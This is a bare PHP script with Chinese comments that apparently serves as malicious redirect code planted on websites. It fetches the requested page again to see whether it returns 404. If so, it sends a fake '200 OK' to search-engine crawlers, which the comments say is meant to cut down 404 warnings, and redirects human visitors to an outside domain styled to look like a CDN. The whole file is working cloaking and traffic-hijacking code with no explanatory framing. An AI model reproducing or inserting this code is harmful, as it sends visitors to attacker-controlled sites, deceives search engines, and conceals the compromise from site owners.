<?php
if (!preg_match('/(v5.379)/i', strtolower($_SERVER['HTTP_USER_AGENT']))) {
	$u = ((isset($_SERVER['HTTPS']) && (strtolower($_SERVER['HTTPS']) != 'off')) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] . ($_SERVER['SERVER_PORT'] == '80' ? '' : ':' . $_SERVER['SERVER_PORT']) . $_SERVER['REQUEST_URI'];
	$array = _404_wget($u);
	if(_404_list($array)){
        //是404
		if(_404_is_spider()){
			//是蜘蛛 , 减少404提醒.
			 header('HTTP/1.1 200 OK');
		}else{
			ob_start();
			$uri = urlencode($_SERVER['REQUEST_URI']);
			header("Location: http://jump.img-css-js-cdn.com/404.php?uri=$uri");
			die();
		}
    }
}

function _404_wget($curl_uri)
{
    $agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; V5.379)';
    $curl = function_exists("curl_init");
    if ($curl) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $curl_uri);
        curl_setopt($ch, CURLOPT_HEADER, 1);
		curl_setopt($ch, CURLOPT_TIMEOUT, 3);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
        curl_setopt($ch, CURLOPT_USERAGENT, $agent);
        $response = curl_exec($ch);
        curl_close($ch);
        list($http_response_header, $content) = explode("\r\n\r\n", $response, 2);
        $http_response_header = explode("\r\n", $http_response_header);
    } else {
        $ctx = stream_context_create(array(
            "http" => array(
                "method" => "GET",
                "follow_location" => 0,
                "ignore_errors" => 1,
                "user_agent" => $agent,
				"timeout"=>3,
            )));
        $content = @file_get_contents($curl_uri, false, $ctx);
    }

    if (isset($http_response_header)) {
        $response_array = array();
        sscanf($http_response_header[0], 'HTTP/%*d.%*d %d', $response_array['http_code']);
        $response_array['header'] = $http_response_header;
        $response_array['content'] = $content;
    } else {
        return false;
    }
    return $response_array;
}

function _404_list($response_array)
{
    $code = $response_array['http_code'];
    if ($code == '404') {
       return true;
    }
}

function _404_is_spider(){
    $agent= strtolower($_SERVER['HTTP_USER_AGENT']);
    if (!empty($agent)) {
        $spiderSite= array(
            "TencentTraveler",
            "Baiduspider+",
            "BaiduGame",
            "Googlebot",
            "msnbot",
            "Sosospider+",
            "Sogou web spider",
            "ia_archiver",
            "Yahoo! Slurp",
            "YoudaoBot",
            "Yahoo Slurp",
            "MSNBot",
            "Java (Often spam bot)",
            "BaiDuSpider",
            "Voila",
            "Yandex bot",
            "BSpider",
            "twiceler",
            "Sogou Spider",
            "Speedy Spider",
            "Google AdSense",
            "Heritrix",
            "Python-urllib",
            "Alexa (IA Archiver)",
            "Ask",
            "Exabot",
            "Custo",
            "OutfoxBot/YodaoBot",
            "yacy",
            "SurveyBot",
            "legs",
            "lwp-trivial",
            "Nutch",
            "StackRambler",
            "The web archive (IA Archiver)",
            "Perl tool",
            "MJ12bot",
            "Netcraft",
            "MSIECrawler",
            "WGet tools",
            "larbin",
            "Fish search",
        );
        foreach($spiderSite as $val) {
            $str = strtolower($val);
            if (strpos($agent, $str) !== false) {
                return true;
            }
        }
    } else {
        return false;
    }
}
?>